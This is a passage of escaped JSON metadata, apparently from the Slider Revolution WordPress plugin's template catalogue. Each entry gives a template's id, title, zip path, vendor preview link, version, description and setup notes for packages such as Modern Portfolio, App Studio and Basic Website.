class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Modern Portfolio\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add a Dramatic Pop of Color to Your Site with a Duotone Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-add-a-dramatic-pop-of-color-to-your-site-with-a-duotone-effect\\/\",\"guide_img\":\"tutorial\\/Modern-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"23\",\"installed\":false},\"296\":{\"id\":\"321\",\"title\":\"Portfolio About\",\"alias\":\"portfolio-about\",\"zip\":\"packs\\/portfolio-about.zip\",\"uid\":\"5d3a4724fd453de5313ceb6696c1db62\",\"img\":\"portfolio-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/modern-portfolio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-portfolio-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern portfolio template with fancy scroll animations and a colorful design.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Modern Portfolio\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add a Dramatic Pop of Color to Your Site with a Duotone Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-add-a-dramatic-pop-of-color-to-your-site-with-a-duotone-effect\\/\",\"guide_img\":\"tutorial\\/Modern-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"23\",\"installed\":false},\"297\":{\"id\":\"322\",\"title\":\"Portfolio Works Title\",\"alias\":\"portfolio-works-title\",\"zip\":\"packs\\/portfolio-works-title.zip\",\"uid\":\"cbb5c6e875cc1f25b463fdf89cabef28\",\"img\":\"portfolio-works-title\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/modern-portfolio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-portfolio-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern portfolio template with fancy scroll animations and a colorful design.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Modern Portfolio\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add a Dramatic Pop of Color to Your Site with a Duotone Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-add-a-dramatic-pop-of-color-to-your-site-with-a-duotone-effect\\/\",\"guide_img\":\"tutorial\\/Modern-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"23\",\"installed\":false},\"298\":{\"id\":\"323\",\"title\":\"Portfolio Works Content\",\"alias\":\"portfolio-works-content\",\"zip\":\"packs\\/portfolio-works-content.zip\",\"uid\":\"5c87311128c7794ffa6ee07ea0648082\",\"img\":\"portfolio-works-content\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/modern-portfolio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-portfolio-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern portfolio template with fancy scroll animations and a colorful design.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Modern Portfolio\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add a Dramatic Pop of Color to Your Site with a Duotone Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-add-a-dramatic-pop-of-color-to-your-site-with-a-duotone-effect\\/\",\"guide_img\":\"tutorial\\/Modern-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"23\",\"installed\":false},\"299\":{\"id\":\"324\",\"title\":\"Portfolio Contacts\",\"alias\":\"portfolio-contacts\",\"zip\":\"packs\\/portfolio-contacts.zip\",\"uid\":\"bd81feffad83b69218f7e837478038e5\",\"img\":\"portfolio-contacts\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/modern-portfolio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-portfolio-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern portfolio template with fancy scroll animations and a colorful design.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Modern Portfolio\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add a Dramatic Pop of Color to Your Site with a Duotone Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-add-a-dramatic-pop-of-color-to-your-site-with-a-duotone-effect\\/\",\"guide_img\":\"tutorial\\/Modern-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"23\",\"installed\":false},\"300\":{\"id\":\"325\",\"title\":\"App Studio Website\",\"alias\":\"app-studio-website\",\"zip\":\"\",\"uid\":\"app-studio-website-package\",\"img\":\"packages\\/App_Studio_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/app-studio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=app-studio-website\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">A modern one-page presentation website to present your mobile app development team.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"App Studio\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"24\",\"installed\":false},\"301\":{\"id\":\"326\",\"title\":\"App Studio Welcome\",\"alias\":\"App-Studio-Welcome\",\"zip\":\"packs\\/App-Studio-Welcome.zip\",\"uid\":\"2ce0f3c54214b04e6c3a9becfd59730c\",\"img\":\"App-Studio-Welcome\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/app-studio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=app-studio-website\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern one-page presentation website to present your mobile app development team.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"App Studio\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"24\",\"installed\":false},\"302\":{\"id\":\"327\",\"title\":\"App Studio Services\",\"alias\":\"App-Studio-Services\",\"zip\":\"packs\\/App-Studio-Services.zip\",\"uid\":\"5df7776271ec69d2f9edaa6b842715a9\",\"img\":\"App-Studio-Services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/app-studio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=app-studio-website\",\"version\":\"1.0.3\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern one-page presentation website to present your mobile app development team.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"App Studio\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"24\",\"installed\":false,\"is_new\":true},\"303\":{\"id\":\"328\",\"title\":\"App Studio About\",\"alias\":\"App-Studio-About\",\"zip\":\"packs\\/App-Studio-About.zip\",\"uid\":\"af8b84dc116c629df7bd89fc69271a2e\",\"img\":\"App-Studio-About\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/app-studio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=app-studio-website\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern one-page presentation website to present your mobile app development team.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"App Studio\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"24\",\"installed\":false},\"304\":{\"id\":\"329\",\"title\":\"App Studio Contacts\",\"alias\":\"App-Studio-Contacts\",\"zip\":\"packs\\/App-Studio-Contacts.zip\",\"uid\":\"afbbd2214c983d314f3215a00db9198d\",\"img\":\"App-Studio-Contacts\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/app-studio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=app-studio-website\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern one-page presentation website to present your mobile app development team.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"App Studio\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"24\",\"installed\":false},\"305\":{\"id\":\"330\",\"title\":\"Cube Animation\",\"alias\":\"cube-animation\",\"zip\":\"cube-animation.zip\",\"uid\":\"c03dd3cfc60479dfc6d79ddb64fa0ec5\",\"img\":\"cube-animation\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/cube-animation-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cube-animation-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern slider with text elements, cube animations and a striking call to action button.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"306\":{\"id\":\"331\",\"title\":\"Basic Website\",\"alias\":\"basic-website\",\"zip\":\"\",\"uid\":\"basic-website-package\",\"img\":\"packages\\/basic_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"307\":{\"id\":\"332\",\"title\":\"Basic Menu\",\"alias\":\"basic-menu\",\"zip\":\"packs\\/basic-menu.zip\",\"uid\":\"39277f53b2cb5ac644a1649b47c37270\",\"img\":\"basic-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"308\":{\"id\":\"333\",\"title\":\"Basic Header\",\"alias\":\"basic-header\",\"zip\":\"packs\\/basic-header.zip\",\"uid\":\"ad7a32dbccb0bdf9de64cf2adfa950a2\",\"img\":\"basic-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"309\":{\"id\":\"334\",\"title\":\"Basic Content\",\"alias\":\"basic-content\",\"zip\":\"packs\\/basic-content.zip\",\"uid\":\"0b12f3b183a3c8206e3a7b28d2d93108\",\"img\":\"basic-content\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"310\":{\"id\":\"335\",\"title\":\"Basic Carousel\",\"alias\":\"basic-carousel\",\"zip\":\"packs\\/basic-carousel.zip\",\"uid\":\"e4abb5c6d5cf914530575a982d3dfc14\",\"img\":\"basic-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"311\":{\"id\":\"336\",\"title\":\"Basic Callout\",\"alias\":\"basic-callout\",\"zip\":\"packs\\/basic-callout.zip\",\"uid\":\"2ccc208b9322f5435d0f4ff64c6d9dab\",\"img\":\"basic-callout\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"312\":{\"id\":\"337\",\"title\":\"Basic Grid\",\"alias\":\"basic-grid\",\"zip\":\"packs\\/basic-grid.zip\",\"uid\":\"3cb4b41d2992eba012921b8fb7c96daa\",\"img\":\"basic-grid\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"313\":{\"id\":\"338\",\"title\":\"Basic Video Block\",\"alias\":\"basic-video-block\",\"zip\":\"packs\\/basic-video-block.zip\",\"uid\":\"e7c1d42b21819741f3e72c1325dae5ed\",\"img\":\"basic-video-block\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"314\":{\"id\":\"339\",\"title\":\"Basic Footer\",\"alias\":\"basic-footer\",\"zip\":\"packs\\/basic-footer.zip\",\"uid\":\"ed8f6a554775ebace558af2f4f2dcbac\",\"img\":\"basic-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic 